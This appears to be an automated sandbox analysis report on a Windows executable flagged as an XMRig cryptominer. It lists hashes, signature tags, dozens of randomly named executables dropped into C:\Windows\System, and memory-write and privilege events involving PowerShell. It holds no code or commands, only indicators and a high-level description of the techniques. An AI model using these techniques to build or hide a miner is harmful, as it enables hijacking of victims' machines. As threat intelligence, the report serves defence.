Malware Analysis Report

2024-11-16 10:57

Sample ID 240614-heflvsyejd
Target a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe
SHA256 aa7da92583976a583149e334ced84c33b40649c2649262e72571e97c756e038a
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aa7da92583976a583149e334ced84c33b40649c2649262e72571e97c756e038a

Threat Level: Known bad

The file a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 06:38

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 06:38

Reported

2024-06-14 06:41

Platform

win7-20240220-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\yupomtJ.exe N/A
N/A N/A C:\Windows\System\cDOLeGv.exe N/A
N/A N/A C:\Windows\System\LJgGEqp.exe N/A
N/A N/A C:\Windows\System\qpOakin.exe N/A
N/A N/A C:\Windows\System\dAqTYlZ.exe N/A
N/A N/A C:\Windows\System\BIfmQuX.exe N/A
N/A N/A C:\Windows\System\KWLltvY.exe N/A
N/A N/A C:\Windows\System\tnxwKcH.exe N/A
N/A N/A C:\Windows\System\YLiTgkI.exe N/A
N/A N/A C:\Windows\System\ZLPcXjo.exe N/A
N/A N/A C:\Windows\System\jfZlRbw.exe N/A
N/A N/A C:\Windows\System\nmUEAuN.exe N/A
N/A N/A C:\Windows\System\qJkBEMd.exe N/A
N/A N/A C:\Windows\System\nmwAqSh.exe N/A
N/A N/A C:\Windows\System\kAGTMOp.exe N/A
N/A N/A C:\Windows\System\wotiXux.exe N/A
N/A N/A C:\Windows\System\sIpBWfu.exe N/A
N/A N/A C:\Windows\System\SEyKTAD.exe N/A
N/A N/A C:\Windows\System\jgHvdtH.exe N/A
N/A N/A C:\Windows\System\NXIiZnN.exe N/A
N/A N/A C:\Windows\System\gGsEamK.exe N/A
N/A N/A C:\Windows\System\xWwXhwV.exe N/A
N/A N/A C:\Windows\System\XXQoixB.exe N/A
N/A N/A C:\Windows\System\KpvwXhr.exe N/A
N/A N/A C:\Windows\System\DdjCzTZ.exe N/A
N/A N/A C:\Windows\System\PJJFhKT.exe N/A
N/A N/A C:\Windows\System\UrsOCin.exe N/A
N/A N/A C:\Windows\System\cvgWuRX.exe N/A
N/A N/A C:\Windows\System\PAgnwcU.exe N/A
N/A N/A C:\Windows\System\huaEGBZ.exe N/A
N/A N/A C:\Windows\System\cuEwthB.exe N/A
N/A N/A C:\Windows\System\uiBLrQU.exe N/A
N/A N/A C:\Windows\System\kYiTEJh.exe N/A
N/A N/A C:\Windows\System\caEdmrr.exe N/A
N/A N/A C:\Windows\System\KtAqcXE.exe N/A
N/A N/A C:\Windows\System\UPoDJvT.exe N/A
N/A N/A C:\Windows\System\NAifKSI.exe N/A
N/A N/A C:\Windows\System\nUsIuMd.exe N/A
N/A N/A C:\Windows\System\LoSWhBa.exe N/A
N/A N/A C:\Windows\System\JqHNIfc.exe N/A
N/A N/A C:\Windows\System\FwlLZUf.exe N/A
N/A N/A C:\Windows\System\oVcGPnr.exe N/A
N/A N/A C:\Windows\System\HymkJHF.exe N/A
N/A N/A C:\Windows\System\tWjAxTg.exe N/A
N/A N/A C:\Windows\System\ESeqsyI.exe N/A
N/A N/A C:\Windows\System\Hbeaufo.exe N/A
N/A N/A C:\Windows\System\CkNBsgB.exe N/A
N/A N/A C:\Windows\System\mBsqsbq.exe N/A
N/A N/A C:\Windows\System\XPbWzHK.exe N/A
N/A N/A C:\Windows\System\ufvOzvH.exe N/A
N/A N/A C:\Windows\System\fRoePTY.exe N/A
N/A N/A C:\Windows\System\XsLyrcv.exe N/A
N/A N/A C:\Windows\System\SeqZowZ.exe N/A
N/A N/A C:\Windows\System\OcrIUWT.exe N/A
N/A N/A C:\Windows\System\fwtZWLz.exe N/A
N/A N/A C:\Windows\System\OPfEWzG.exe N/A
N/A N/A C:\Windows\System\VbiyDuD.exe N/A
N/A N/A C:\Windows\System\jcmndzF.exe N/A
N/A N/A C:\Windows\System\sOFhdXX.exe N/A
N/A N/A C:\Windows\System\ghkXNdU.exe N/A
N/A N/A C:\Windows\System\lARDCSX.exe N/A
N/A N/A C:\Windows\System\rFaeHNk.exe N/A
N/A N/A C:\Windows\System\mEojqqc.exe N/A
N/A N/A C:\Windows\System\VxRVzkP.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\RfziLhi.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\JrFcmXd.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\YHOWJpf.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\PvSWZES.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\FyGsIQm.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\pvWOUYk.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\TuwrNvh.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\IMgtxOo.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ijpMmCD.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\lDHSYWd.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\nmoUJFE.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZBdBcPN.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\LGtnpYb.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ybDJhoo.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\hMYIdLM.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\XEdmOsA.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\LoYQRdZ.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\jEABZTT.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\xGAzaoU.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\zhOZJni.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\MfxrzAF.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\Gttlaid.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\oDxVSkV.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\hGmzoDs.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\QUctfuA.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\SsaVXqP.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\lGYVPyU.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\vvbvjPM.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\dCSyKZl.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\tQFMCdd.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\uTjhFJp.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\iuhCCbK.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\HltRlyO.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\AtWtMAt.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\gwnAiwV.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\SBxBZTl.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\dLhrkFR.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\desEpOv.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\xIlJKfw.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\AUpEjrQ.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\LsENwDw.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\AXSpXEZ.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\DyYyIGM.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\ohFIRwf.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\XBlsxKP.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\lQLuqFa.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\WxNsQKh.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\KpRcepV.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\vrwFWJt.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\PwnVupz.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\LsPqlxQ.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\WayIRXY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\nuQsUJR.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\NufyyWu.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\HGhYeeV.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\wTVVfuB.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\SaIMcTY.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\unOGznN.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\cfKWxCk.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\eWaOISM.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\bBmXTxu.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\UrFybDm.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\QjPVhaR.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
File created C:\Windows\System\VrJPdXb.exe C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2728 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2728 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\yupomtJ.exe
PID 2728 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\yupomtJ.exe
PID 2728 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\yupomtJ.exe
PID 2728 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\cDOLeGv.exe
PID 2728 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\cDOLeGv.exe
PID 2728 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\cDOLeGv.exe
PID 2728 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\LJgGEqp.exe
PID 2728 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\LJgGEqp.exe
PID 2728 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\LJgGEqp.exe
PID 2728 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qpOakin.exe
